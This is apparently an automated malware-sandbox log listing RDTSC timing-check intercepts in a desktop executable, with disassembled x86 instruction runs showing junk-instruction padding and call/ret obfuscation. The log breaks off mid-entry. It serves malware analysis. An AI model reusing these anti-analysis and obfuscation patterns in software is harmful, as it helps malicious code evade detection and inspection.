Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D146EB second address: D14750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 nop 0x00000007 push dword ptr fs:[00000000h] 0x0000000e sub dword ptr [ebp+1244F241h], edi 0x00000014 mov dword ptr fs:[00000000h], esp 0x0000001b mov edi, dword ptr [ebp+122D1CF3h] 0x00000021 mov eax, dword ptr [ebp+122D0139h] 0x00000027 or dword ptr [ebp+122D2B62h], eax 0x0000002d push FFFFFFFFh 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007F5E810FCBA8h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 jc 00007F5E810FCBA8h 0x0000004f mov edi, ecx 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jnc 00007F5E810FCBACh 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D153C2 second address: D153C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D14750 second address: D14756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D153C8 second address: D153CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D16363 second address: D16375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E810FCBAEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D16375 second address: D16388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F5E8080F356h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D16388 second address: D163A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D163A4 second address: D1642F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F363h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F5E8080F358h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D3012h], ebx 0x0000002a xor edi, dword ptr [ebp+122D2DE5h] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F5E8080F358h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 00000016h 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c push 00000000h 0x0000004e push 00000000h 0x00000050 push eax 0x00000051 call 00007F5E8080F358h 0x00000056 pop eax 0x00000057 mov dword ptr [esp+04h], eax 0x0000005b add dword ptr [esp+04h], 00000015h 0x00000063 inc eax 0x00000064 push eax 0x00000065 ret 0x00000066 pop eax 0x00000067 ret 0x00000068 xchg eax, esi 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d jnp 00007F5E8080F356h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1642F second address: D16435 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D165DC second address: D165E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D183F7 second address: D183FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1A347 second address: D1A3A0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F5E8080F358h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push ecx 0x00000026 mov ebx, dword ptr [ebp+122D3C40h] 0x0000002c pop edi 0x0000002d push 00000000h 0x0000002f mov edi, 77A75870h 0x00000034 push 00000000h 0x00000036 cmc 0x00000037 xchg eax, esi 0x00000038 jmp 00007F5E8080F35Dh 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push esi 0x00000041 jmp 00007F5E8080F35Ah 0x00000046 pop esi 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1A3A0 second address: D1A3A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1C49C second address: D1C4A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F5E8080F356h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1A556 second address: D1A568 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5E810FCBA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1D685 second address: D1D69A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5E8080F35Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1A568 second address: D1A572 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5E810FCBA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F856 second address: D1F87A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D217AA second address: D217B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D29022 second address: D2902C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5E8080F356h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2EF9E second address: D2EFA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2F1FD second address: D2F201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2F201 second address: D2F207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2F207 second address: D2F220 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5E8080F35Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2F220 second address: D2F226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2F226 second address: D2F22B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33104 second address: D33108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33108 second address: D3310E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D334BE second address: D334D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F5E810FCBA6h 0x0000000d jmp 00007F5E810FCBAAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D334D5 second address: D334D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33626 second address: D3362B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33944 second address: D339A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E8080F35Dh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F5E8080F366h 0x0000000f js 00007F5E8080F356h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push esi 0x0000001a jne 00007F5E8080F356h 0x00000020 jmp 00007F5E8080F368h 0x00000025 pop esi 0x00000026 pushad 0x00000027 push eax 0x00000028 pop eax 0x00000029 push edx 0x0000002a pop edx 0x0000002b jnc 00007F5E8080F356h 0x00000031 popad 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D339A6 second address: D339AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D39282 second address: D392CC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E8080F36Ch 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5E8080F364h 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F5E8080F366h 0x00000017 pop ebx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jo 00007F5E8080F379h 0x00000020 push eax 0x00000021 push edx 0x00000022 jg 00007F5E8080F356h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D392CC second address: D392D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D392D0 second address: D392D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC84A5 second address: CC84AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D37F0A second address: D37F38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F368h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F5E8080F35Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D37F38 second address: D37F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F5E810FCBAEh 0x0000000b jmp 00007F5E810FCBB9h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5E810FCBB6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D37F7D second address: D37F9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F5E8080F356h 0x0000000a jmp 00007F5E8080F364h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38133 second address: D3813F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5E810FCBA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38597 second address: D385B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E8080F367h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3870E second address: D38712 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38712 second address: D3871E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38BCC second address: D38BD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38BD4 second address: D38BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38BD8 second address: D38BDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D40627 second address: D40650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F5E8080F356h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F5E8080F367h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D40650 second address: D4067A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB9h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jng 00007F5E810FCBCFh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4067A second address: D4069B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E8080F363h 0x00000009 popad 0x0000000a pushad 0x0000000b jo 00007F5E8080F356h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F30E second address: D3F313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F313 second address: D3F325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5E8080F356h 0x0000000a jo 00007F5E8080F356h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F46E second address: D3F479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007F5E810FCBA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F479 second address: D3F488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F5E8080F356h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F77C second address: D3F781 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F781 second address: D3F796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b je 00007F5E8080F356h 0x00000011 pop esi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3F8EF second address: D3F8F4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FA70 second address: D3FA77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FA77 second address: D3FA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FA82 second address: D3FA86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FC56 second address: D3FC5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FC5B second address: D3FC61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FEEA second address: D3FEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F5E810FCBABh 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FEFD second address: D3FF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FF03 second address: D3FF10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F5E810FCBA6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D400A0 second address: D400A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D400A4 second address: D400B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5E810FCBA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07193 second address: D071B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F5E8080F356h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D071B8 second address: D071BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07419 second address: D07446 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5E8080F356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F5E8080F358h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007F5E8080F365h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07446 second address: D0745B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5E810FCBAEh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D078B9 second address: D078C9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5E8080F356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D078C9 second address: D078F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F5E810FCBACh 0x00000013 mov eax, dword ptr [eax] 0x00000015 jnc 00007F5E810FCBB8h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D078F9 second address: D078FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D078FD second address: D07913 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E810FCBA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07A0F second address: D07A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07A13 second address: D07A19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07A19 second address: D07A1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07A1F second address: D07A3F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b mov edx, dword ptr [ebp+122D2E2Dh] 0x00000011 nop 0x00000012 jnp 00007F5E810FCBB2h 0x00000018 je 00007F5E810FCBACh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07A3F second address: D07A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F5E8080F356h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07A4D second address: D07A51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07AF1 second address: D07AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07AF5 second address: D07B03 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5E810FCBA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07B03 second address: D07B33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F5E8080F35Fh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5E8080F362h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07B33 second address: D07B69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F5E810FCBB9h 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5E810FCBB2h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07DDE second address: D07DE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D07DE4 second address: D07DE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0820F second address: D08214 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D085AC second address: D085B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D085B2 second address: D0866C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F35Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F5E8080F358h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 lea eax, dword ptr [ebp+1247BF53h] 0x0000002e call 00007F5E8080F35Dh 0x00000033 jl 00007F5E8080F358h 0x00000039 pushad 0x0000003a popad 0x0000003b pop ecx 0x0000003c push eax 0x0000003d ja 00007F5E8080F36Ch 0x00000043 mov dword ptr [esp], eax 0x00000046 add ecx, 3CCC3FBBh 0x0000004c lea eax, dword ptr [ebp+1247BF0Fh] 0x00000052 